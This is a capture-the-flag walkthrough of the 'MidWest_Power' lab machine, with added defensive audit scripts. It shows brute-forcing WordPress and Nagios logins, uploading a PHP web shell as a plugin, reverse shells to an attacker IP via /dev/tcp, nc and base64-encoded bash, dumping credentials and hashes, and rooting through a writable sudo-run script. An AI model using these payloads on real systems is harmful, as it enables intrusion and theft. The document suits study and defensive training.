MidWest_Power

ip a

192.168.241.181

Information gathering

Host discovery

sudo nmap -sn  192.168.241.0/24

The target IP is 192.168.241.184

Port discovery

sudo nmap -sT --min-rate 10000 -p-  192.168.241.184 -oA nmapscan/ports
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Initial foothold

Port scan

sudo nmap -sT -sV -sC -O -p22,80 192.168.241.184 -oA nmapscan/detail
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 31:62:bb:fc:87:9a:39:01:96:54:03:18:bb:03:bc:90 (RSA)
| 256 4d:21:68:a0:58:a4:18:27:ba:bd:29:ba:a7:91:bc:35 (ECDSA)
|_ 256 77:ce:55:b4:87:93:dc:4c:05:6e:67:90:3f:78:d0:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6
|_http-title: Midwest Power – Powering the future!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:D9:5D:BC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP scan

sudo nmap -sU --top-ports 20 192.168.241.184 -oA nmapscan/udp
PORT      STATE         SERVICE
68/udp open|filtered dhcpc
123/udp open ntp
135/udp open|filtered msrpc
138/udp open|filtered netbios-dgm
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
631/udp open|filtered ipp
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike

Vulnerability scan

sudo nmap --script=vuln -p22,80 192.168.241.184 -oA nmapscan/vuln
PORT     STATE  SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.241.184
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.241.184:80/
| Form id:
|_ Form action: http://www.midwest.htb/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.6
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.

Penetration testing

Overview

There is only one web service, running WordPress 5.6, for a new-energy company.
A quick look at the redirect shows it goes to a www.midwest.htb address,
so bind that name in the local hosts file.

Found the login page: http://www.midwest.htb/wp-login.php

Run wpscan against it

sudo wpscan --url http://www.midwest.htb/ -e u

[+] admin


sudo wpscan --url http://www.midwest.htb/ --enumerate u --usernames ./user.txt --passwords /usr/share/wordlists/rockyou.txt

Directory brute force

sudo gobuster dir -u http://www.midwest.htb/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/wp-includes/ contains many files, most of which cannot be displayed

/nagios 401

What is nagios?
It is a network monitoring tool.

nagios

curl http://www.midwest.htb/nagios
This site is asking you to sign in.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at www.midwest.htb Port 80</address>
</body></html>

This also requires credentials

The VulnHub hint says brute forcing is involved.
The WordPress credentials didn't crack, so maybe it applies here.
https://dev59.com/askubuntu/ka_lNIkBSVA65lAchAWB#google_vignette
The default Nagios account is nagiosadmin; try it together with the admin user found earlier.

nagiosadmin
admin
sudo hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.241.184 http-get /nagios -t 32

The wordlist is far too slow; the brute force goes nowhere.
There is no ready-made Nagios wordlist online,
so build one.

Wordlist generation

First, collect the strings from the home page and other pages

sudo cewl http://www.midwest.htb/  -d 2 -w nagios.txt

Then use John's rules to generate permutations, to cover the case of a stronger password

john -rules -wordlist=nagios.txt -stdout | sort | uniq > pass.txt

Now we have a fairly comprehensive wordlist

Brute force

sudo hydra -L user.txt -P pass.txt 192.168.241.184 http-get /nagios -t 32

[80][http-get]
host: 192.168.241.184
login: nagiosadmin password: PowerPower

Success.
While we're at it, run it against the blog too.

sudo wpscan --url http://www.midwest.htb/ --enumerate u --usernames ./wpuser.txt --passwords pass.txt

[!] Valid Combinations Found:
| Username: admin, Password: Power9

ok

Nagios XI

Nagios® Core™
Version 4.4.6 in Nagios XI

System Config shows some service check commands, but they cannot be modified

WP

Log in: there is an email verification prompt; choose "remind me later" and we are in the dashboard.
There is only one user, admin.

No plugins found; the pending updates are two theme files; no upload point found.
But under Plugins there is an Add Plugins option,
which allows uploads.
Upload a small web shell and see.

plugins

If you have a plugin in a .zip format, you may install or update it by uploading it here

This should work like the theme zip overwrite from a previous box: write a small PHP shell, zip it, and upload it to see what happens.

Installing plugin from uploaded file: test.zip

Unpacking the package…

Installing the plugin…

The package could not be installed. No valid plugins were found.

Plugin installation failed.

https://stackoverflow.com/questions/10563782/wordpress-plugin-installation-fail#:~:text=Click%20on%20%E2%80%9Cupload%20file%20%28s%29%E2%80%9D%20and%20upload%20the,and%20go%20to%20the%20dashboard.%20Click%20on%20%E2%80%9CPlugins%E2%80%9D

Someone in that thread answered:

It seems you have put the wrong folder/file. wordpress only realizes that there is a plugin when it can get a php file whose header contains at least this line

/* Plugin name: your plugin name */

So, you have to check..

- unzip the plugin file and see if there is any php file containing a header like that. your plugin file should be in.. wp-content/PLUGIN_DIRECTORY/PLUGIN_FILE.php

check this first and let us know if it works or not

So I add a signature of my own to the PHP file

<?php
/* plugin name: test */
system($_GET['cmd']);
phpinfo();
?>
Installing plugin from uploaded file: test.zip

Unpacking the package…

Installing the plugin…

Plugin installed successfully.

Uploaded successfully; Activate plugins.
phpinfo is shown, but the page is very laggy, so write a revshell instead

<?php
/* plugin name: rev */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.181/443 0>&1'");
phpinfo();
?>

Got a shell
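An added defender-side example, not code from the write-up: a scanner over a wp-content/plugins tree that flags uploaded plugins shaped like the ones above, a bare "plugin name:" header wrapping a command sink fed from request input or a reverse-shell one-liner. The sample plugin files and the 10.0.0.1 address are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample plugins (not files from the target in the write-up): one normal
# header, and two files shaped like the minimal "plugin name:" shells described above.
SAMPLE_PLUGINS = {
    "hello/hello.php": "<?php\n/*\nPlugin Name: Hello Dolly\nVersion: 1.7\nAuthor: Matt\n*/\n"
                       "function hello() { echo 'hi'; }\n",
    "test/test.php": "<?php\n/* plugin name: test */\nsystem($_GET['cmd']);\nphpinfo();\n?>\n",
    "rev/rev.php": "<?php\n/* plugin name: rev */\n"
                   "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/443 0>&1'\");\n?>\n",
}

# WordPress accepts an upload as a plugin on a case-insensitive "Plugin Name:" line alone.
HEADER_RE = re.compile(r"plugin\s+name\s*:", re.I)
FULL_HEADER_RE = re.compile(r"^[ \t*]*(Version|Author|Description)\s*:", re.M | re.I)
SINK_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
REVSHELL_RE = re.compile(r"/dev/tcp/|\bnc\s+-e\b|bash\s+-i\b")

def audit_plugin(src):
    """Return indicator strings for one PHP file; an empty list means nothing suspicious."""
    if not HEADER_RE.search(src):
        return []  # WordPress would not treat this file as a plugin at all
    hits = []
    if not FULL_HEADER_RE.search(src):
        hits.append("minimal header (only Plugin Name)")
    if SINK_RE.search(src) and INPUT_RE.search(src):
        hits.append("command sink fed from request input")
    if REVSHELL_RE.search(src):
        hits.append("reverse-shell pattern")
    return hits

def scan_plugins_dir(root):
    """Walk a wp-content/plugins tree and map each flagged PHP file to its indicators."""
    root, report = Path(root), {}
    for php in sorted(root.rglob("*.php")):
        hits = audit_plugin(php.read_text(errors="replace"))
        if hits:
            report[str(php.relative_to(root))] = hits
    return report

def demo():
    # Write the constructed samples into a temporary tree and scan it.
    with tempfile.TemporaryDirectory() as d:
        for rel, body in SAMPLE_PLUGINS.items():
            path = Path(d, rel); path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
        return scan_plugins_dir(d)
```

Run scan_plugins_dir against the real wp-content/plugins directory to audit an installation; a hit on "command sink fed from request input" is the pattern of the test.zip plugin above.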

Privilege escalation

www-data

root:x:0:0:root:/root:/bin/bash
nagios:x:1001:1001::/home/nagios:/bin/bash
administrator,,,:/var/lib/postgresql:/bin/bash

shellinabox:x:115:123:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin

No standard server privesc path found.
Since Nagios is present, look for a privesc CVE.

First, the default Nagios install location is /usr/local/src;
on the target it lives under /usr/local/,
with two folders, nagios and nagiosxi

drwxr-xr-x  8 root     root     4096 Jan 22  2021 nagios
drwxr-xr-x 10 root nagios 4096 Jan 22 2021 nagiosxi
drwxr-xr-x 5 www-data www-data 4096 Jan 22 2021 nagvis
/nagios/etc
cat nagios.cfg
# MODIFIED
admin_email=root@localhost
admin_pager=root@localhost
translate_passive_host_checks=1
log_event_handlers=0
use_large_installation_tweaks=1
enable_environment_macros=0
...
broker_module=/usr/local/nagios/bin/ndo.so /usr/local/nagios/etc/ndo.cfg

Nagios can very likely get me to root

/usr/local/nagiosxi/etc
cat htpasswd.users

nagiosadmin:{SHA}CR5yxS528yxH6d4rAwgvtKyuAvM=
nagiosxi:{SHA}L21ZSH6P9HEpeFEW312EItg4fkY=


/usr/local/nagiosxi/var
cat xi-sys.cfg
htpasswdbin='/usr/bin/htpasswd'
mkdirbin='/bin/mkdir'
mrtgcfg='/etc/mrtg/mrtg.cfg'
pgsqlrootpass='postgres'
pgsqlpass='nagiosxi'
php_extension_dir='/usr/lib64/php/modules'


cat config.inc.php
<?php
// DB-specific connection information
$cfg['db_info'] = array(
"nagiosxi" => array(
"dbtype" => 'mysql',
"dbserver" => '',
"user" => 'nagiosxi',
"pwd" => 'n@gweb',
"db" => 'nagiosxi',
"charset" => "utf8"

www-data@midwest:/usr/local/nagios/libexec$ ls
ls
;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM0LzQ0NDQ0IDA+JjE= | base64 -d | bash;#
check_apt
check_asterisk.pl
...
check_wmi_plus_help.pl
check_xi_sla.php
check_xml.php
check_yum
custom_check_mem
custom_check_procs
folder_watch.pl
negate
process_perfdata.pl
remove_perfdata
send_nsca
urlize
utils.pm
utils.sh

Found database credentials, along with some of the check commands shown earlier in the Nagios frontend.
Two of them are base64-encoded strings?

Decode them

bash -i >& /dev/tcp/192.168.1.134/44444 0>&1

bash -i >& /dev/tcp/192.168.1.234/44444 0>&1

1592732 -rwxr-xr-x 1 www-data nagios ;echo 111 | base64 -d | bash;#
1592713 -rwxr-xr-x 1 www-data nagios ;echo 222 | base64 -d | bash;#

These are clearly reverse-shell payloads.
The other files are mostly binaries, hard to modify.

Look through the configuration files

/usr/local/nagios/etc/services
cat localhost.cfg

define service {
host_name localhost
service_description Current Load
use local-service
check_command check_local_load!5.0,4.0,3.0!10.0,6.0,4.0
register 1
}

define service {
host_name localhost
service_description Current Users
use local-service
check_command check_local_users!20!50
register 1
}

define service {
host_name localhost
service_description HTTP
use local-service
check_command check_http
register 1
}

define service {
host_name localhost
service_description Memory Usage
use local-service
check_command check_local_mem!30!20
register 1
}

define service {
host_name localhost
service_description PING
use local-service
check_command check_ping!100.0,20%!500.0,60%
register 1
}

define service {
host_name localhost
service_description Root Partition
use local-service
check_command check_local_disk!20%!10%!/
register 1
}

define service {
host_name localhost
service_description Service Status - crond
use local-service
check_command check_xi_service_status!crond!!!!!!
register 1
}

define service {
host_name localhost
service_description Service Status - httpd
use local-service
check_command check_xi_service_status!httpd!!!!!!
register 1
}

define service {
host_name localhost
service_description Service Status - mysqld
use local-service
check_command check_xi_service_status!mysqld!!!!!!
register 1
}

define service {
host_name localhost
service_description SSH
use local-service
check_command check_ssh
register 1
}

define service {
host_name localhost
service_description Swap Usage
use local-service
check_command check_local_swap!50%!30%
register 1
}

define service {
host_name localhost
service_description Total Processes
use local-service
check_command check_local_procs!400!500!RSZDT
register 1
}

This matches the services seen at http://192.168.241.184/nagios/ > Configuration > Services

check_local_load
check_local_users 1
check_http
check_local_mem
check_ping
check_local_disk
check_xi_service_status
check_ssh 1
check_local_swap
check_local_procs

Focus on these running services and see whether a reverse shell can be written into one of them, cron-job style (as nagios)

Going through them with cat, only check_local_users and check_ssh exist (but both are binaries).
There are also custom_check_mem and custom_check_procs.

So write a reverse shell into these 2 readable bash scripts, using port 4443

echo "bash -i >& /dev/tcp/192.168.241.181/4443 0>&1" > custom_check_mem 

echo "bash -i >& /dev/tcp/192.168.241.181/4443 0>&1" > custom_check_procs

Still nothing; no reverse shell received

Looked it up: need to use nc?

echo 'nohup nc -e /bin/bash 192.168.241.181 4443 &' >custom_check_mem

Probably because without nohup the process was killed by the system
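An added audit script, not from the write-up, covering two findings above: the libexec listing with `;echo ... | base64 -d | bash;#` file names owned by www-data, and the custom_check_mem/custom_check_procs scripts that the nagios daemon executes but the web user can rewrite. It flags shell metacharacters in plugin names, owners outside an assumed trusted set (root, nagios), and group/other write bits; SAMPLE_ENTRIES are constructed records mirroring the listing.

```python
import pwd
import re
import stat
from pathlib import Path

# Accounts allowed to own check plugins (an assumption for this example): any other
# owner, such as www-data, means the web tier can rewrite code the nagios user runs.
TRUSTED_OWNERS = {"root", "nagios"}
META_RE = re.compile(r"[;|&`$<>]")

def audit_plugin_entry(name, owner, mode):
    """Return indicator strings for one libexec entry (file name, owner login, st_mode)."""
    hits = []
    if META_RE.search(name):
        hits.append("shell metacharacters in filename (command-injection residue)")
    if owner not in TRUSTED_OWNERS:
        hits.append(f"owned by untrusted account {owner}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        hits.append("writable by group or others")
    return hits

def audit_libexec(root):
    """Stat every entry of a real Nagios libexec directory and report the suspicious ones."""
    report = {}
    for p in Path(root).iterdir():
        st = p.lstat()
        try:
            owner = pwd.getpwuid(st.st_uid).pw_name
        except KeyError:
            owner = str(st.st_uid)  # uid without a passwd entry
        hits = audit_plugin_entry(p.name, owner, st.st_mode)
        if hits:
            report[p.name] = hits
    return report

# Constructed records mirroring the write-up's listing (injected file names and the
# custom_check_* scripts were owned by www-data, mode 755); the base64 is a placeholder.
SAMPLE_ENTRIES = [
    (";echo YmFzaA== | base64 -d | bash;#", "www-data", 0o100755),
    ("custom_check_mem", "www-data", 0o100755),
    ("check_apt", "root", 0o100755),
    ("check_yum", "nagios", 0o100775),
]

def demo():
    """Audit the constructed records without touching the filesystem."""
    return {n: h for n, o, m in SAMPLE_ENTRIES if (h := audit_plugin_entry(n, o, m))}
```

On a live host, run audit_libexec("/usr/local/nagios/libexec") as a periodic integrity check alongside a hash manifest of the shipped plugins.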

nagios

nagios@midwest:/home/nagios$ cat user.txt
7ec306b6fa01510ffc4e0d0fac97c23e

User nagios may run the following commands on midwest:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *

CVE-2020-28900 – Nagios Fusion and XI privilege escalation from nagios to root via upgrade_to_latest.sh, but I couldn't find the details.
But with this many entries, an ls of the permissions is enough.

/etc/init.d/nagios
/etc/init.d/npcd
/usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php
/usr/bin/php
/usr/local/nagiosxi/scripts/send_to_nls.php
/usr/local/nagiosxi/scripts/components/getprofile.sh
/usr/local/nagiosxi/scripts/upgrade_to_latest.sh
/usr/local/nagiosxi/scripts/change_timezone.sh
/usr/local/nagiosxi/scripts/manage_services.sh
/usr/local/nagiosxi/scripts/reset_config_perms.sh
/usr/local/nagiosxi/scripts/manage_ssl_config.sh
/usr/local/nagiosxi/scripts/backup_xi.sh
ls -liah /usr/bin/php
1584510 lrwxrwxrwx 1 root root 21 Jan 22 2021 /usr/bin/php -> /etc/alternatives/php

273778 -rwxr-xr-x 1 nagios nagios 1.5K Jan 22 2021 /usr/local/nagiosxi/scripts/send_to_nls.php

Write the privesc command

echo '<?php system("/bin/bash");?>' > /usr/local/nagiosxi/scripts/send_to_nls.php

sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
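An added check, not part of the write-up, for the class of sudo rule abused above: it parses `sudo -l` output (re-joining the php entry that the post shows wrapped over two lines) and reports argv paths that a non-root user could rewrite, such as send_to_nls.php owned by nagios. The demo builds a throwaway directory tree as a stand-in for the real paths; SUDO_L is a subset of the rules listed above.

```python
import re
import stat
import tempfile
from pathlib import Path

# sudo -l output as shown in the write-up; the first php entry was line-wrapped in the post.
SUDO_L = """User nagios may run the following commands on midwest:
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /usr/bin/php
        /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
"""
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?:NOPASSWD:\s*)?(?P<cmd>.+)$")

def parse_sudo_l(text):
    """Return [(runas, argv)] from `sudo -l` output, re-joining wrapped command lines."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas"), m.group("cmd").split()))
        elif rules and line.startswith("/"):
            rules[-1][1].extend(line.split())  # continuation of the previous rule
    return rules

def tamperable(path):
    """True if a file sudo will run as root can be modified by a non-root user."""
    try:
        st = Path(path).stat()
    except OSError:
        return False  # missing path: nothing to rewrite (sudo would just fail)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_rules(rules, root="/"):
    """Map each rule's command line to the argv paths (looked up under root) it could rewrite."""
    findings = {}
    for _runas, argv in rules:
        bad = [a for a in argv if a.startswith("/") and tamperable(Path(root, a.lstrip("/")))]
        if bad:
            findings[" ".join(argv)] = bad
    return findings

def demo():
    """Constructed fixture: a throwaway tree in which send_to_nls.php is group-writable."""
    with tempfile.TemporaryDirectory() as d:
        for rel, mode in [("usr/bin/php", 0o755), ("usr/local/nagiosxi/scripts/send_to_nls.php", 0o775)]:
            p = Path(d, rel); p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text("placeholder\n"); p.chmod(mode)
        return audit_rules(parse_sudo_l(SUDO_L), root=d)
```

With root="/" and the output of `sudo -l -U nagios` the same audit runs against the real host; every path it reports is a file that should be root-owned and not group/other writable.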

root

cat root.txt
0d599f0ec05c3bda8c3b8a68c32a1b47